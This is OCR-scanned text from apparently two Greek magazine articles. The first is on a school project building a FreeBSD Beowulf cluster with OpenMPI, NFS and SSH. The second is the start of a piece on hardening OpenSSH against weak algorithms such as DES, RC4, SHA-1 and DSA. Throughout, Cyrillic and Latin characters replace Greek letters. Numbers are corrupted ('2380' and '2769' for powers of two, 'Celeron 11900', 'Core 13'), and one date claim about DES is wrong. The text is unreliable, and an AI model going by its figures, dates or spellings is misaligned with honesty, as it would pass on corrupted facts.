και δεν εἶναι ανάγκη να εἶναι ὁμοια, οὐτε ιδιαίτερα ισχυρά. Ίσως εἶναι ὥρα να βγάλε- 
τε εκεἰνο τον ξεχασμένο Pentium II апо το ντουλάπι, για µια τελευταῖα фора. 


Το Aiolos Project δεν ξεκίνησε επειδἠ µας περἰσσευαν καινούρια ἡ пала µηχανή- 
рата. Όπως θα δείτε, για την κατασκευὴ του αγοράσαµε ειδικὲς μητρικὲς και για 
την ὥρα ο γράφων ἐχει ξοδέψει περὶ τα 240 ευρῶ. O σκοπὸς ὁμως εἰναι ιερὀς. Στο 
ημερολόγιο του Aiolos Project (http://aiolos.freebsdworld.gr/node/2) θα δείτε ὁτι TO 
όλο εγχείρημα ξεκίνησε ως Eva OXOAIKO project, алла OX! µε την έννοια της εργασἰ- 
ας για κἄποιο µάθηµα. Σκεφτεἰτε το σαν ша παράπλευρη ενασχόληση, που θα µας 
προσέφερε γνώσεις και χαρά. Па να ευδοκιμήσει ёха τέτοιο εγχείρημα στο σχολείο, 
χρειάζονται κάποια πράγματα που δυστυχώς δεν εἶναι δεδομένα: 


ο Καθηγητές που δεν βαριούνται και δεν σέρνονται ano τη ша αἴθουσα στην 
ἄλλη, διδάσκοντας κάθε μέρα τα ἰδια βαρετὰ πράγματα 


ο Μαθητές nou προτίθενται να διαθέσουν τον ελεύθερο χρόνο τους για ναπειρα- 
ματιστούν, аут! να πίνουν καφέδες και va παΐζουν τα τελευταία video games 


ο Εξοπλισμὸ ἡ χρήματα για να αγοραστεὶ (ο εξοπλισμός) 


ο To FreeBSD, το εἰπαμε; AUTO πρέπει να το θεωρείτε πάντα δεδομένο :) 
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Εικόνα 1 

O κόμβος master χρησιμοποιείται για τον ἐλεγχο του cluster, διαθέτει όλα τα δεδοµένα 
και συγκεντρώνει τα αποτελέσµατα. OI κόμβοι slave εκτελούν то πρὀγραμµα των uno- 
λογισμών. Ὅλοι οι κὀμβοι συνδέονται μεταξύ τους µε κάρτες δικτύου (Ethernet) κι Eva 
switch. (Το σχήμα εἶναι ano τη Wikipedia.) 


Όταν ἠρθε στον γράφοντα η επιφοίτηση, υπήρχαν рохо τα δύο апо τα παραπάνω 
συστατικά: То прото και το τέταρτο. Βέβαια υπήρχε και το δεύτερο, αλλά μιλάμε 
µόνο για ἑναν μαθητή. Χωρίς αυτόν, πάντως, το Aiolos Project δεν θα ξεκινούσε. 
Όσο για το τρίτο συστατικὀ, θα σας πω μόνο Eva πράγμα (αλλά µη το πείτε στη 
madam Μέρκελ): Λεφτά υπάρχουν ἡ, τέλος πάντων, θα τα βρούμε! Ортос ἡ ἄλλως 
δεν θα χρειαστούν πολλὰ. 


Н ιδέα ξεκίνησε λίγο πριν το Δεκέμβρη του 2014 οπὀτε και δημιουργήθηκε το site 
(http://aiolos.freebsdworld.gr), γράφτηκε το FAQ (http://aiolos.freebsdworld.gr/ 
node/1) και ξεκίνησε η καταγραφὴ Tou project στο ημερολόγιο που αναφέραμε npo- 
ηγουμένως. Την ἰδια περίοδο δημιουργήσαμε και ша διαφημιστικἠ αφίσα (http:// 
aiolos.freebsdworld.gr/node/7) ὀπως επἰσης και τις απαραίτητες σημειώσεις (http:// 
aiolos.freebsdworld.gr/node/6), ὥστε να βοηθήσουμε τους νέους φίλους να ἐρθουν 
σε επαφἠ µε то FreeBSD. Κι αν δεν το ἐχετε καταλάβει ως тора, να σας πούμε OT! TO 
cluster που στήνουμε θα βασίζεται σε Eva πανίσχυρο λειτουργικὀ σύστημα, προϊὸν 
Ελεύθερου Λογισμικού, To FreeBSD. Μη νομίζετε ὁμως От! εἰχαμε και πολλὲς επιλο- 
yec. Πα να φτιάξει κανεὶς Eva Beowulf Cluster, θα στραφεί υποχρεωτικά σε κἄποιο 
σύστημα τύπου Unix. Θα μπορούσαμε να χρησιμοποιήσουμε οποιαδήποτε διανομή 
του Linux ἡ του BSD, αλλά τα Windows αποκλείονται. Αν χρησιμοποιούσαμε Linux, 
θα ἦταν προτιμότερο να ξεκινήσουμε µε µια λιτή διανομὴ, στην οποία θα χτίζαμε 
σταδιακἀ τα απαιτούμενα προγράμματα και Ох! µε κἄποια διανομὴ full desktop, ano 
την οποία θα ἐπρεπε να ξηλώσουμε τα шоа πακέτα. Ката το παρελθὀν, ο γράφων 
εἰχε στήσει Eva Beowulf Cluster µε τη βοήθεια του Debian GNU/Linux. Αυτή τη фора, 
όμως, то ἰδιο πρὀσωπο (ο γράφων ;)) αποφάσισε να εργαστεί µε то αγαπημένο του 
FreeBSD και, ταυτόχρονα, να μυήσει σε αυτό ὀσους Ва τον ακολουθούσαν. Πάντως, 
τα περισσότερα βήματα που θα δούμε μπορούν να αναπαραχθούν και σε κἄποιο oÙ- 
στηµα Linux. Αν εἰσαστε εξοικειωμένοι µε τη γραμμή εντολών και τη "χειροκίνητη" 
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Το πρώτο σας FreeB5D Beouulf Cluster! 
κκ κκ κκ 


Εικόνα 2 

To miniwulf αποτελεί ¿va FreeBSD cluster, για την κατασκευή του οποίου ξο- 
δέψαµε πολλά ευχάριστα απογεύματα. Μπορείτε να διαβάσετε περισσότερα 
γι' αυτὀ στο http://blizzard.rwic.und.edu/~nordlie/miniwulf 


επἐμβαση σε αρχεία ρυθµἰσεων, μπορείτε апла να χρησιμοποιήσετε την αγαπημένη 
σας διανομή Linux και δεν θα ἐχετε κανένα πρὀβλημα. Αν орос θέλετε να στήσετε 
το cluster και την ἰδια στιγμή να μάθετε να εγκαθιστἆτε va σύστημα FreeBSD, θα 
σας προτείναμε να ξεκινήσετε апо το ακόλουθο PDF: 


http://aiolos.freebsdworld.gr/sites/default/filles/install101.pdf 


Πρὀκειται για ἑναν σύντομο οδηγὀὸ που EEkiva την εγκατάσταση του FreeBSD ano 
το μηδὲν και φτάνει μέχρι το περιβάλλον γραφικών. Παρεμπιπτόντως, πρέπει να 
σημειώσουμε бт! το περιβάλλον γραφικὠν απαιτείται μόνο σε va апо τα μηχανή- 
рата του cluster. Τα υπόλοιπα θα κάνουν μόνο πράξεις και δεν θα διαθέτουν οθόνη, 
οπότε η προσθήκη GUI σ' αυτά θα ἦταν εντελώς άχρηστη ενέργεια. Σε πρώτη φάση, 
λοιπὸν, θα σας προτείναμε va εξοικειωθεἰτε µε την εγκατάσταση του FreeBSD, uż- 
хр! το σημείο ὀπου ξεκινά η ρύθμιση του περιβάλλοντος γραφικών (σελἰδα 21 στις 
σημειώσεις). 


Beowulf Cluster και υπηρεσῖες συστήµατος 


Σε Eva compute cluster, πολλοί υπολογιστές συνδέονται μεταξύ τους κι εκτελούν το 
ἰδιο πρὀγραμμα. O καθένας ὁμως χρησιμοποιεί το δικὀ του σύνολο δεδομένων και, 
ουσιαστικά, ο καθένας επιλύει Eva διαφορετικὀ τµήµα του εκἁστοτε προβλήματος. 
Στο τέλος, οι καρποί της εργασίας όλων των κὀμβων συνδυάζονται κατάλληλα npo- 
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κειμένου να ἐχουμε TO τελικὀ αποτέλεσμα. Προφανώς, η κατηγορἰα των проВАпна- 
των που μπορούν να επιλυθούν µε αυτό τον τρὀπο εἶναι συγκεκριμένη. Πρέπει να 
υπάρχει Eva μεγάλο σύνολο αρχικών δεδομένων, το οποίο να рпорєі να σπάσει σε 
επιµέρους τμήματα και καθένα ano αυτά να παρουσιάζει µια σχετικἠ ανεξαρτησία: 
Να µπορεἰ να υποστεί την οποιαδήποτε επεξεργασία, ανεξάρτητα ano τα υπόλοιπα 
τμήματα. H τοπολογἱα ενὸς συστήµατος Beowulf φαίνεται στην εικὀνα 1. Αν θέλετε 
να δείτε κι ἑνα cluster µε μηχανήματα που τρέχουν FreeBSD, ρἰξτε µια ματιὰ στην 
εικὀνα 2. Τα μηχανήματα της εικὀνας εἶναι αρκετά παλιά, алла οὑτως ἡ ἄλλως η ιδέα 
του Beowulf Cluster δεν εἶναι κι αυτή καινούρια |) 


Ας αφἠσουµε ὁμωςτο hardware κι ας στραφούμε στο software, που δίνει ζωὴ σ' Eva 
TETOIO σύστημα. Εκτός апо το λειτουργικὀ σύστημα, το cluster апат! προγράμμα- 
τα που εἶναι γραμμένα µε κατάλληλο τρὀπο. Ας δούµε μερικἁ χαρακτηριστικἁ που 
παρουσιάζουν τα προγράμματα Tou εἰδους: 


ο Το εκτελέσιμο αρχεἰο εἶναι комо, αλλά κάθε στιγμιότυπο που εκτελεῖται σε 
κάποιο μηχάνημα γνωρίζει το ρόλο του αντίστοιχου κόμβου (αν εἶναι master 
ἡ slave), πόσοι άλλοι κόμβοι συμμετέχουν και ποιο τμήμα δεδομένων πρέπει 
να επεξεργαστεἰ. Παρεμπιπτόντως, το εκτελἑσιµο αρχείο βολεύει να βρίσκεται 
σ' ἑναν κοινόχρηστο κατάλογο του master node και να εἶναι διαθέσιμο στους 
υπόλοιπους κόμβους μέσω NFS. 


ο H εκτέλεση του προγράμματος ξεκινάει ano To master node και µε κἄποιον 
μυστηριώδη τρόπο φαίνεται να ξεκινάει ταυτόχρονα και στους κόμβους slave. 
Δεδομένου OTI ἑνα πρὀγραμμα εκτελεἰται πάντοτε апо κάποιον συγκεκριμένο 


—— VE 
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Εικόνα 3 
Ιδού µία апо τις μητρικές που θα χρησιμοποιηθούν στο Aiolos Project (Asrock Q1900b-ITX). 
Την έχουμε δοκιμάσει ήδη µε TO FreeBSD 10.1-RELEASE και λειτουργεί άψογα! 
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Εικόνα 4 

Κάπως ἐτσι σκοπεύουµε να τοποθετήσουµε τις μητρικές, αφού 
βρούμε τον κατάλληλο τρὀπο στήριξης. Πα τη στέγαση των uno- 
λοίπων εξαρτημάτων θα φτιάξουμε µια βάση ano plexiglass. Па την 
ψύξη σκοπεύουµε να πάρουμε Evav ανεμιστήρα 23 εκατοστών! 


χρήστη κι Ох: апо πολλοὺς μαζί, τα στιγμιότυπα που τρέχουν στους κόμβους 
slave εἶναι αναμενόμενο να εκτελούνται апо τον ἰδιο χρήστη. Στην праүра- 
τικότητα Χρησιμοποιείται η υπηρεσία OpenSSH και µε την εκτέλεση του про- 
γράμματος στον κόμβο master, πραγματοποιείται αυτόματα η σύνδεση στους 
υπόλοιπους κόμβους και η εκτέλεση προγράµµατος. 


ο Οι κὀμβοι slave πρέπει να επικοινωνούν τουλάχιστον µε TOV κόμβο master, ενώ 
σε κάποιες περιπτώσεις απαιτείται και η μεταξύ τους επικοινωνία. Τα μηνύματα 
που ανταλλάσσονται εἶναι του τύπου "πάρε αυτὸ το αποτἐλεσµα", "δώσε µου 
κάτι να κάνω" ἡ "αυτό το κομμάτι το ἐχω αναλάβει eyo". Σε κάθε περίπτωση, 
πρέπει να θυμόμαστε бт! πρὀκειται για στιγμιότυπα του ἰδιου προγράµµατος 
και ὁτι μόνο τα δεδομένα διαφοροποιούνται (Single Program, Multiple Data). 


Ano την παραπάνω περιγραφὴ έχουμε εντοπίσει NON δύο υπηρεσίες που θα µας na- 
ρέχει το λειτουργικὀ: NFS για To file sharing και SSH үа τη σύνδεση στους κόμβους 
και της εκτέλεση του προγράμματος. H ρύθμιση των παραπάνω αποτελεἰ απλἠ uno- 
θεση, ενώ ειδικἁ για το OpenSSH, μπορούμε να υποθέσουμε оті αρκετοἰ αναγνώστες 
το γνωρίζουν πολὺ καλά. Πάντως, για την ακριβή ρύθμιση του SSH που απαιτεἰ η 
λειτουργία evoc Beowulf cluster, μπορείτε να συμβουλευτείτε τις ακόλουθες σηµει- 
ὠσεις: 
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http://aiolos.freebsdworld.gr/sites/default/files/aiolos1.pdf 


Φαίνεται ὁμως να λείπει κάτι ακόμα: Ποιο εἶναι το σύστημα µε το οποίο γίνεται η 
ανταλλαγἠ των μηνυμάτων μεταξὺ των κόμβων; Nac γνωρίζει κάθε κόμβος το ρὀλο 
του, τα δεδομένα που πρέπει να επεξεργαστεἰ και το συνολικὀ πλήθος των κόμβων; 
Και σε τελικἠ ανάλυση, пос γράφεται ἑνα πρὀγραμμα που συμπεριφἑρεται διαφορε- 
τικἀ σε κάθε κόμβο; Πα να απαντήσουμε σε αυτά τα ερωτήματα πρέπει να μιλήσουμε 
για την καρδιά των clusters: τον μηχανισμὸ MPI (Message Passing Interface) και την 
ομώνυμη βιβλιοθήκη. 


ΜΡΙ και ΟΡΕΠΜΡΙ 


Το Message Passing Interface αποτελεὶ švav μηχανισμὀ για την ανταλλαγή µηνυ- 
μάτων μεταξύ διεργασιών (processes), µε σκοπὸ την παράλληλη εκτέλεση σε ou- 
στήματα µε κατανεμημένη μνήμη. Μια поло συνηθισμένη χρήση, ὁπως φαντάζεστε, 
εἶναι η δημιουργία συστηµάτων Beowulf. Το MPI, ως πρωτόκολλο, εἶναι ανεξάρτητο 
апо την εκἁστοτε γλῶσσα προγραμματισμού και υποστηρἰζει την επικοινωνία τύπου 
"σημείο προς σημείο" (point to point), ὁπως και τη λεγόμενη συλλογική επικοινωνία 
(collective communications). Το πρωτόκολλο ἐχει περάσει апо διάφορα στάδια εξὲ- 
λιξης και σήμερα μιλάμε για το MPI-2. ‘Eva εναλλακτικὀ πρωτόκολλο για παρόμοιες 
εργασἰες εἶναι то PVM (Parallel Virtual Machine), το onoio ξεκίνησε μερικὰ χρόνια 
πριν ano το MPI και αποτέλεσε την nnyñ ἐμπνευσης του τελευταίου. Όπως φαντὰ- 
ζεστε υπάρχουν πολλὲς υλοποιήσεις του πρωτοκόλλου MPI, αλλά εμεὶς επιλέξαμε 
τη βιβλιοθήκη OpenMPI. Το πολύ ενδιαφέρον χαρακτηριστικὀ της συγκεκριμένης 
βιβλιοθήκης εἶναι бт! συνεργάζεται µε τη γλὠσσα Python. Έτσι, καταφέραμε να ava- 
κατέψουμµμε ὁλα τα αγαπημένα µας θέματα: FreeBSD, Beowulf και Python! 


H εγκατάσταση του OpenMPI στο FreeBSD εἶναι πολύ απλἠ υπόθεση και καλύπτεται 
στις σημειώσεις που αναφέραμε προηγουμένως. Επιγραμματικὰ, για να ακολουθήσε- 
τε το Aiolos Project πρέπει να κάνετε τα εξἠς: 


- Να εγκαταστήσετε Eva σύστημα FreeBSD (ἡ Linux) χωρίς απαραίτητα κάποιο 
περιβάλλον γραφικὠν 


- Να ρυθμίσετε Tov OpenSSH server σύμφωνα HE TIC σημειώσεις µας 
- Να εγκαταστήσετε το OpenMPI (пал µε τη βοήθεια των σημειώσεων) 


- Να κάνετε λίγη υπομονή, καθώς παράλληλα μ' εσάς φτιάχνουμε κι εμείς το δικὀ 
μας cluster ;) 


Μπορείτε να παρακολουθείτε την πρὀοδὸ µας και να κατεβάζετε ὀποιες σημειώσεις 
ετοιµάζουμε апо το επἰσημο site Tou project, ἡ апо τη σελίδα µας στο Facebook: 
http://www.facebook.com/acproject. Στο μεταξὺ, ας δούµε το υλικὸ που σκοπεύουμε 
να χρησιμοποιήσουμε στο Aiolos Project. 


Το υλικό του Aiolos 


Για το δικὀ µας (σχολικὀ) cluster ἐχουμε επιλέξει кат! πρωτότυπο: Δεν θα χρησιµο- 
ποιήσουμε ολόκληρα κουτιά υπολογιστών, αλλά θα φτιάξουμε µια κατασκευἠ στην 
οποία οι μητρικὲς θα τοποθετηθούν η ша πάνω апо την ἄλλη, σαν µια στοίβα. H 
βάση θα ἐχει σχήμα П και θα στεγἁσει το τροφοδοτικὀ, τους δίσκους και το switch 
για τη δικτυακή σύνδεση των κόμβων. Napatnpnoate oT! εἰπαμε "τροφοδοτικό" και 
ὀχι "τροφοδοτικά"; Σκοπεύουµε να τροφοδοτήσουμε τις τρεις µητρικὲς που θα ano- 
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τελούν τους κόμβους slave µε το ἰδιο τροφοδοτικὀ! Αυτό ελπἰζουμε OT! θα εἶναι εφι- 
кто (δεν το έχουμε κάνει ακόμα :D) καθώς οι μητρικὲς ἐχουν ελάχιστες ενεργειακὲς 
απαιτήσεις. Πρόκειται για mini-ITX motherboards µε επεξεργαστές Celeron 11900. 
Μη γελάτε µε την επιλογἡ του επεξεργαστή! Εἶναι τελευταίας γενιάς (Bay trail), 
αρκετά γρήγορος και фтпуос̧. Επιπρὀσθετα, οι μητρικὲς εἶναι πολὺ μικρὲς κι EXOUV 
παθητικὴ ψύξη. Μάλιστα, η κατανάλωσή τους UNO πλἠρες φορτίο εἶναι τόσο ҳарп- 
An, που η ψύκτρα τους δεν ζεσταίνει οὐτε σάντουιτς!. Eni του παρὀντος διαθέτουμε 
ἠδη µια τέτοια µητρική, ενώ την ора που θα διαβάζετε αυτὲς τις γραμμές θα ἐχουμε 
παραλάβει και τη δεύτερη. Οι επεξεργαστὲἐς που αναφέραμε εἶναι τετραπύρηνοι κι 
αυτό σημαίνει От! µε τις τρεις μητρικὲς θα ἐχουμε στη διἀὰθεσὴ µας δώδεκα πυρήνες. 
Στο ρὀλο του κόμβου master θα χρησιμοποιήσουμε Evav φορητό υπολογιστή μ' ἑναν 
διπύρηνο επεξεργαστὴ Core 13. Σημειώστε ὁτι ἑνας πυρήνας θα επιστρατευθεἰ για 
τους υπολογισμούς, ενώ ο ἄλλος θα αναλάβει διαχειριστικἀ καθήκοντα. 


О конбос master διαθέτει 8GB RAM, ενὠ κάθε κὀμβος slave θα διαθέτει 4GB RAM. 
Ἔτσι To Beowulf Cluster που σχεδιάζουμε θα διαθέτει συνολικἁ 14 πυρήνες και 20GB 
μνήμης. Επιπρόσθετα, κάθε κόμβος slave θα ἐχει Eva δίσκο χωρητικότητας 500GB, 
ενώ ο master θα προσφέρει και ἑναν κοινόχρηστο αποθηκευτικὀ χώρο. Πα To switch 
avoigaue το γνωστὸ ντουλάπι µε τα εξαρτήματα και βρήκαμε Eva "πεντάθυρο Ka- 
τοστάρι" (100Mbps / 5port), το οποίο μπορεὶ va 'ναι apyo και ακατάλληλο για va 
σύγχρονο τοπικὀ δίκτυο, αλλά εἶναι υπεραρκετὸὀ για τις ανάγκες του cluster. 


Ελπίζουμε να παρακολουθήσετε την πορεία της κατασκευῆς µας αλλά, πολύ περισ- 
σὀτερο, ευελπιστούµε бт! θα ξεκινήσετε κι εσεὶς την ἰδια περιπέτεια! Στο επόμενο 
ἀρθρο θα εξετάσουµετις λεπτομέρειες για τη ρύθμιση των απαιτούμενων υπηρεσιών 
του συστήματος, ενώ θα κάνουμε και ша πρώτη δοκιμή του OpenMPI! Μέχρι τότε 
σας ευχόμαστε να περάσετε πολλὲς ευχάριστες, ξάγρυπνες και δημιουργικὲς νύχτες 


/ 


Εικόνα 5 

ΣτΙγµιότυπο апо την πρώτη συνάντηση του Aiolos Project, ката την οποία παρουσιάστηκαν οι βασικές 
έννοιες, μοιράστηκαν οι σημειώσεις και CD για LEPIKEG δοκιμαστικές εγκαταστάσεις του FreeBSD ото 
VirtualBox. Μπορείτε να ξεκινήσετε κι εσείς τους πειραματισμούς σας µε τον ἰδιο τρόπο. 


1. O γράφων θυμάται συστήµατα, επάνω στην ψύκτρα των οποίων μπορούσες να τηγανίσεις αυγά! 
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Skill: Intermediate 
Tags: Snowden, SSH, public key authentication, fingerprints, passwordless 
login, two-factor authentication 
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Ασφαλέστερο OpenSSH, εδὠ και тора! 


Με την πάροδο του χρόνου οι τεχνικὲς επιθέσεων βελτιώνονται. AUTO εἶναι το μόνο 
σίγουρο. Αντίθετα, τα προβληµατικἀ συστήματα δεν διορθώνονται πάντα ἐγκαιρα κι αν 
συνυπολογίσουμε την αδιαφορία ἡ και την ἄγνοια ορισμένων διαχειριστῶν, τα πράγματα 


γίνονται σκούρα: Μια επίθεση που σήμερα εἶναι πρακτικἁ ακἰνδυνη και αδιάφορη, aupio 
δεν αποκλείεται να μετατραπεί σε εφιάλτη. Ἔχοντας αυτά ката νου, θα εξετάσουμε 
ορισμένα προληπτικἁ μέτρα για τη θωράκιση των κρυπτογραφημένων συνδέσεων SSH. 


Ясфалєстєро OpenSSH, εδώ και τώρα! 
ПЕЕВ ККСКУОУООӨЎОӨОӨОЎЭЎОССС С—С ААСО 


Πόσο ασφαλεὶς εἶναι οι συνδέσεις Secure Shell; Μη νομίζετε бт! σκοπεύουμµε να 
κάνουμε κάποια αποκάλυψη - βόμβα. Δεν γνωρίζουμε κάτι συνταρακτικὀ ἡ, τέλος 
πάντων, κάτι που να µη γνωρίζετε κι εσεἰς. H ερώτηση τίθεται ως αφετηρἰα προβλη- 
ματισμού. Πα την υλοποίηση µιας σύνδεσης SSH απαιτούνται αρκετά βήματα, ὅπως 
η δηµιουργία και η ανταλλαγή ενὸς κοινού μυστικού μεγέθους (του κλειδιού), η 
πιστοποίηση της ταυτότητας των "συνομιλητών", η κρυπτογράφηση των μηνυμάτων 
к.а. Όπως αντιλαμβάνεστε, σε αυτά τα στάδια αξιοποιούνται διάφοροι αλγόριθμοι, 
που θα μπορούσαμε να πούμε бт! συνδυάζονται σαν τους κρίκους µιας αλυσίδας. Αν 
σε κάποιον апо αυτούς εντοπιστεἰ ша ευπάθεια, η προστασία που παρέἐχει το SSH 
θα κλονιστεἰ. Προσοχή: Δεν Аёнє OT! θα παραβιαστεϊ: µόνο бт! θα κινδυνέψει. Το αν 
θα ξεπεραστεἰ πλήρως η ασφάλεια εξαρτάται апо τη φύση της ευπάθειας, καθώς κι 
ano το посо εξελιγμένες εἶναι οι αντἰστοιχες επιθέσεις. 


Πίσω апо τις προηγούμενες, σχεδὀν GUTOVONTEG, διατυπώσεις, κρύβεται µια κρίσιμη 
λεπτομέρεια που συνήθως παραβλέπουμµε: Οι αλγόριθμοι που χρησιμοποιούνται στην 
κρυπτογραφἰα δεν κινδυνεύουν µόνο апо τις προγραμματιστικὲς αδυναμίες, δηλαδἠ 
ano τα λάθη ἡ τις παραλεἰψεις των προγραμματιστών (implementation flaws). Eno- 
μένως, η τακτικἡ ενηµέρωση του λογισμικού δεν εἶναι σίγουρο ότι NOPE! να µας 
προφυλάξει. Μη σας παραξενεύει auto. H *uAonoinon* ενὸς αλγορίθμου ενδέχεται 
να εἶναι εξαιρετικἀ προσεγμένη κι απαλλαγμένη ano κάθε bug, αλλά η ἴδια η λογικἠ 
του να τον καθιστὰ τρωτόὀ (design flaws). Σκεφτεἰτε το εξἠς: Οι αλγόριθμοι Kpu- 
πτογράφησης μετασχηματἰίζουν τα δεδοµένα σε µια ακατάληπτη µορφή, επιστρα- 
τεύοντας περίπλοκες μαθηματικὲς διαδικασἰες και, σε ορισμένες περιπτώσεις, EVA 
πρόσθετο σύνολο δεδομένων που ονομάζεται "κλειδί". Οι μαθηματικὲς διαδικασἰες 
που πετυχαίνουν τη μετατροπή ¿xouv σχεδιαστεἰ κατὰ τέτοιον τρόπο, ὥστε η αντι- 
στροφἠ τους να εἶναι εξαιρετικἁ δύσκολη και *практіка* αδύνατη. AUTO орос δεν 
σημαίνει ὁτι εἶναι εντελὼς ανέφικτη. Όταν δεν γνωρίζουμε το κλειδὶ της κρυπτογρά- 
φησης ἡ ὀταν δεν υπάρχει καθόλου κλειδὶ (βλ. αλγὀριθµους hashing, fingerprinting 
к.о.к.), εἶναι жпрактіка* αδύνατο να ξεκινήσουμε апо τα κρυπτογραφηµἑένα δεδομὲ- 
να (ἡ το hash, To fingerprint κ.ο.κ.) και να βρούμε τα αρχικἁ, µη-κρυπτογραφημένα. 
Ακόμη και µε µια επίθεση brute force, οι απαιτούμενες δοκιμὲς εἶναι τόσο πολλὲς που 
ο αντίστοιχος χρόνος εἶναι απαγορευτικἁ μεγάλος. Θεωρητικά, ωστόσο, τίποτα an' 
όλα αυτά δεν εἶναι αδύνατο. Με την πάροδο του χρόνου η διαδικασία αντιστροφἠς 
ορισμένων αλγορίθμων επιταχύνθηκε σε τέτοιο βαθµό, που οι αλγόριθμοι θεωρήθη- 
καν σπασμένοι. AUTO συνέβη εἰτε γιατὶ εντοπίστηκαν κάποιες αδυναμἰες στο µαθη- 
µατικὀ υπόβαθρο, siTe γιατὶ υπήρξαν εξελἰξεις στα μαθηματικὰ που επέτρεψαν την 
ταχύτερη λύση κάποιων υπολογιστικὠν προβλημάτων. 


Φαίνεται, λοιπὸν, ὁτι υπάρχουν αδυναμίες που μπορούν να εντοπἰσουν οι проүрар- 
ματιστὲς, αλλά κι αδυναμίες που μπορούν να εντοπἰσουν οι Μαθηματικοἰ. Τελικά, 
αυτὸ που πρέπει να θυμόμαστε εἶναι το εξἠς: Υπάρχουν προβλήµατα που διορθώ- 
νονται µε va software update, καθώς κι ἄλλα που απαιτούν την αντικατάσταση 
κάποιων τμημάτων του software. Στη δεύτερη περίπτωση, ο εκάστοτε διαχειριστής 
πρέπει να εἶναι кала ενημερωμένος και πάνω απ' όλα ψύχραιμος. 


Οι прото τριγμοὶ 


Για αρκετούς αναγνώστες τα παραπάνω εἶναι γνωστὰ και δεν προκαλούν καμία ÈK- 
Πληξη. Σε τελικἠἡ ανάλυση, το SSH µπορεἰ να µην παραμείνει ἄτρωτο για πάντα, 
αλλά κανένα σύστημα δεν εἶναι τἐλειο κι αυτό επἰσης δεν εκπλήσσει κανέναν. Н 
κατάσταση που ἐχει διαμορφωθεί, όμως, δεν επιτρέπει την ολιγωρἰα. Σε ὁ,τι αφο- 
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wheezy main 
wheezy main 


wheezy/updates main contrib 


wheezy/updates main contrib 


wheezy-updates main contrib 
wheezy-updates main contrib 


wheezy-backports main non-free contrib 


Па την αντικατάσταση των ευπαθών αλγορίθμων θα χρειαστούμε 
µια σχετικά πρόσφατη ἐκδοση του OpenSSH. Па auTo το λόγο, 
στις διανομές που βασίζονται στο Debian πρέπει va προσθέσου- 
µε το repository µε Ta λεγόμενα backports. 


ра ορισμένους αλγόριθμους, o! θεωρητικοἰ κίνδυνοι που περιγράψαμµμε ἐχουν γίνει 
πραγματικοί. Δεν υπονοούμε ὁτι η ασφάλεια των συνδέσεων SSH ἐχει καταλυθεἰ, 
παρὰ µόνον oT! κάποιοι αλγόριθμοι χρειάζονται αντικατάσταση. Επιτρέψτε µας να 
εξηγήσουμε. 


Το DES (Data Encryption Standard) εἶναι ἑνας δημοφιλής αλγόριθμος συμμετρι- 
κῆς κρυπτογράφησης που υποστηρίζεται апо пара πολλὲς εφαρμογές. Σχεδιάστηκε 
μέσα στη δεκαετία του '90 апо την IBM, µετη μυστική συνδρομὴ (av Ox! παρέμβαση) 
της NSA. Όπως θα γνωρίζετε, η ασφάλεια του συγκεκριμένου αλγορίθμου Exel ξε- 
περαστεἰ προ πολλού. Τα μηνύματα που έχουν κρυπτογραφηθεἰ ката DES μπορούν 
να σπάσουν σε λιγότερο апо μία μέρα. Μάλιστα, αυτὲς οι επιδόσεις ανήκουν σε ἑναν 
υπερυπολογιστἠ ονόματι RIVYERA, που κατασκευάστηκε μόλις то 2008. Κάτι napo- 
μοιο ισχύει και για ἑναν ακόµα αλγόριθμο συμμετρικὴς κρυπτογράφησης, ο οποίος 
εἶναι γνωστὸς απὀ τη χρήση του στα πρωτόκολλα WEP, WPA και TLS. Αναφερόμαστε 
στον αλγόριθμο RC4 (απαντάται και σαν ARCFOUR). Н αλήθεια εἶναι От! ο συγκε- 
κριμένος αλγόριθμος δεν Exe! αλωθεῖ ολοκληρωτικά ὀπως ο DES, αλλά θεωρείται 
σπασμένος. Βλέπετε, το 2013 δημοσιεύτηκε µια επἰθεση που επέτρεπε την "εξαγω- 
yn" του κλειδιού κρυπτογράφησης апо τη μελέτη ενὸς μεγάλου ὀγκου κρυπτογρα- 
φημένων δεδομένων. Το γεγονὸς εξάλλου OT! η Microsoft και To Mozilla Foundation 
προτείνουν την απόσυρση του RC4, δεν πρέπει να µας αφήνει αδιάφορους. O! δύο 
εταιρείες, µετά κι апо τις αποκαλύψεις Snowden, θεωρούν ὁτι ορισμένες μυστικὲς 
υπηρεσίες μπορούν να σπάσουν τον συγκεκριµένο αλγόριθμο πανεύκολα. 
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Ιδού οἱ αλγόριθμοι που υποστηρίζει εξ ορισμού το OpenSSH, 
για την αρχικἠ ανταλλαγή των κλειδιών και τη δημιουργία του 
"βασικού" κλειδιού κρυπτογράφησης. 


Ας περάσουμε ӧрос̧ και σ' ἑναν αλγόριθμο hashing. Πιστεύουμε бт! δεν υπάρχει 
κανένας χρήστης του Linux που να µην ἐχει ακούσει για τον SHA-1, ¿vav αλγόριθμο 
που ανέπτυξε η NSA και διαδέχτηκε τον ξεπερασμἐνο/σπασμένο 5ΗΑ-Ο. Μέχρι πριν 
ano περίπου δέκα χρόνια, ο αλγόριθμος SHA-1 αντιμετώπιζε μόνο την απειλἠ µιας 
επίθεσης brute force. O λόγος που προσπερνάμε αυτή την απειλἠ εἶναι απλὀς: Πα 
να βρεθούν δύο διαφορετικά strings nou να δίνουν το ἴδιο HASH (кат! που αποτελεὶ 
τεράστιο πρόβλημα και συνιστά σπάσιμο για ἑναν αλγὀριθµο hashing) απαιτούνται 
2380 δοκιμὲς. H κατάσταση ἄλλαξε το 2005, отау μία ομάδα Κινέζων επιστημόνων 
(Xiaoyun Wang, Yiqun Lisa Yin και Hongbo Yu) δημοσίευσε µια βελτιωμένη μέθοδο 
επίθεσης που απαιτούσε 2769 δοκιμές. AUTO το νούμερο εξακολουθεὶ να εἶναι TE- 
ράστιο, αλλά η επίθεση των Κινέζων ερευνητών εἶναι 2048 φορὲς (2411) ταχύτερη 
ano µια επίθεση brute force. Σε τελικἠ ανάλυση, εφὀσον ανακαλύφθηκε μία επίθεση 
που εἰναι ταχύτερη апо το "τυφλό" brute force, δεν αποκλείεται να ανακαλυφθούν 
και ἄλλες, ακόμα πιο апоботікёс̧. Па το τέλος αφήσαμε τον αλγόριθμο DSA, που 
Χρησιμοποιείται για την παρασκευἠ κλειδιὼν και τη λεγόμενη Ψηφιακἠ υπογραφή. 
О συγκεκριμένος αλγόριθμος στηρἰζεται σε µεγάλο βαθμό στην τυχαιότητα, ενὼ 
παράγει κλειδιὰ που ἐχουν μήκος ακριβώς 1024 bits. Το δεύτερο χαρακτηριστικὀ 
